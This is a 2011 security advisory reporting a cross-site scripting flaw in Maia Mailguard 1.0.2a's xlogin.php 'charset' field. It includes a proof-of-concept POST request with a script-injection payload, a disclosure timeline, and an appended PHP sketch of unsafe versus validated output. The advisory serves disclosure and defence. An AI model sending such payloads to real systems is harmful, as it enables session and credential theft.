
Maia Mailguard 1.0.2a Cross Site Scripting

07 Apr 2011 | Reported by Mario Lopez | Type: packetstorm | Source: packetstormsecurity.com

Maia Mailguard 1.0.2a XSS vulnerability in "xlogin.php" allows injection of arbitrary HTML and JavaScript code, leading to theft of authentication credentials and sensitive data disclosure

Code
`===================================  
BUGUROO SECURITY SYSTEMS ALERT  
- Advisory: http://buguroo.com/adv/Buguroo_ADV_2011-001.txt  
- Discovered on: March 29th, 2011  
- Discovered by: Mario Lopez (mlopez (at) buguroo (dot) com)  
- Severity: 5/10  
===================================  
  
1. VULNERABILITY  
----------------------------  
Maia Mailguard is affected by an XSS vulnerability in version 1.0.2a.  
  
2. BACKGROUND  
----------------------------  
Maia Mailguard is a web-based interface and management system based on the  
popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl and  
PHP, Maia Mailguard gives end-users control over how their mail is processed  
by virus scanners and spam filters, while giving mail administrators the  
power to configure site-wide defaults and limits.  
  
3. DESCRIPTION  
----------------------------  
Any user can inject arbitrary HTML and JavaScript code into the application  
and have it executed.  
  
The vulnerability exists because the "xlogin.php" script fails to properly  
sanitize user-supplied input in the "charset" variable. Successful  
exploitation of this vulnerability could result in a compromise of the  
application, theft of cookie-based authentication credentials, and  
disclosure or modification of sensitive data.  
  
4. PROOF OF CONCEPT  
----------------------------  
An attacker can use a browser to exploit this vulnerability. An example PoC  
request is as follows:  
  
POST https://example.com/xlogin.php HTTP/1.1  
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,  
application/x-shockwave-flash, application/xaml+xml,  
application/vnd.ms-xpsdocument, application/x-ms-xbap,  
application/x-ms-application, */*  
Referer: https://example.com/login.php  
Accept-Language: es  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;  
.NET CLR 2.0.50727; .NET CLR 3.0.04506.30)  
Content-Type: application/x-www-form-urlencoded  
Host: example.com  
Content-Length: 63  
Connection: Keep-Alive  
Cache-Control: no-cache  
  
super=&charset="></style><script>alert(11700)</script>&username=user&pwd=pass&submit=+Login+  
  
5. BUSINESS IMPACT  
----------------------------  
Theft of admin authentication credentials can damage the corporation's image.  
  
6. SYSTEMS AFFECTED  
----------------------------  
Maia Mailguard v1.0.2a and prior (all).  
  
7. SOLUTION  
----------------------------  
Sanitize the inputs.  
  
8. REFERENCES  
----------------------------  
http://www.maiamailguard.com  
http://blog.buguroo.com  
  
9. CREDITS  
----------------------------  
This vulnerability has been discovered and reported by Mario Lopez Jimenez,  
Senior Security Analyst with Buguroo Offensive Security (mlopez (at) buguroo  
(dot) com).  
  
10. DISCLOSURE TIMELINE  
----------------------------  
2011-03-29: Vulnerability was identified  
2011-03-31: Vendor contacted  
2011-04-01: Response and correction started.  
2011-04-03: Update Available.  
2011-04-07: Buguroo publishes this security advisory.  
  
11. ABOUT BUGUROO  
----------------------------  
Buguroo is a Spanish offensive security company founded in 2007, exclusively  
dedicated to the development of IT security solutions by means of its own  
software factory. We are a 100% R+D company under continuous evolution and  
technological renovation, enabling us to stay at the vanguard of our sector  
and to offer a first-class service worldwide.  
  
12. DISCLAIMER  
----------------------------  
Buguroo Offensive Security, S.L. assumes no liability for the use of the  
information provided in this advisory. This advisory was released in an  
effort to help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
--   
Mario López Jiménez  
Buguroo Offensive Security  
www.buguroo.com  
`
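
Section 7 of the advisory says only "Sanitize the inputs." The PHP sketch below is an added example, not Maia Mailguard's code or the vendor's fix: it shows a reflected charset value handled unsafely and then with allow-list validation plus output encoding. It assumes xlogin.php echoes the "charset" parameter into the HTML response; the function names and the charset allow-list are hypothetical.

```php
<?php
// Added illustration; NOT Maia Mailguard source code.
// Assumption: the login handler reflects the client-supplied "charset"
// value into the HTML it returns.

// Constructed allow-list; a real deployment would list the charsets it supports.
const ALLOWED_CHARSETS = ['utf-8', 'iso-8859-1', 'iso-8859-15', 'windows-1252'];
const DEFAULT_CHARSET  = 'utf-8';

/** Before: the value is concatenated verbatim, so markup in it becomes page markup. */
function render_meta_unsafe(string $charset): string
{
    return '<meta http-equiv="Content-Type" content="text/html; charset=' . $charset . '">';
}

/** Validation: anything that is not a known charset name falls back to the default. */
function normalize_charset(?string $input): string
{
    $candidate = strtolower(trim((string) $input));
    return in_array($candidate, ALLOWED_CHARSETS, true) ? $candidate : DEFAULT_CHARSET;
}

/** After: validate on input, then encode on output as a second layer. */
function render_meta_safe(?string $input): string
{
    $charset = normalize_charset($input);
    $encoded = htmlspecialchars($charset, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<meta http-equiv="Content-Type" content="text/html; charset=' . $encoded . '">';
}

// Constructed sample inputs: a legitimate value, the value from the
// advisory's request body, and a missing parameter.
$samples = ['ISO-8859-1', '"></style><script>alert(11700)</script>', null];

foreach ($samples as $value) {
    echo 'input:  ', var_export($value, true), PHP_EOL;
    if ($value !== null) {
        // Shown as text on the CLI only, to compare with the hardened output.
        echo 'unsafe: ', render_meta_unsafe($value), PHP_EOL;
    }
    echo 'safe:   ', render_meta_safe($value), PHP_EOL, PHP_EOL;
}
```

Run with `php` on the command line; the value taken from the advisory's request body is rejected by the allow-list and the safe renderer emits the default charset instead.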
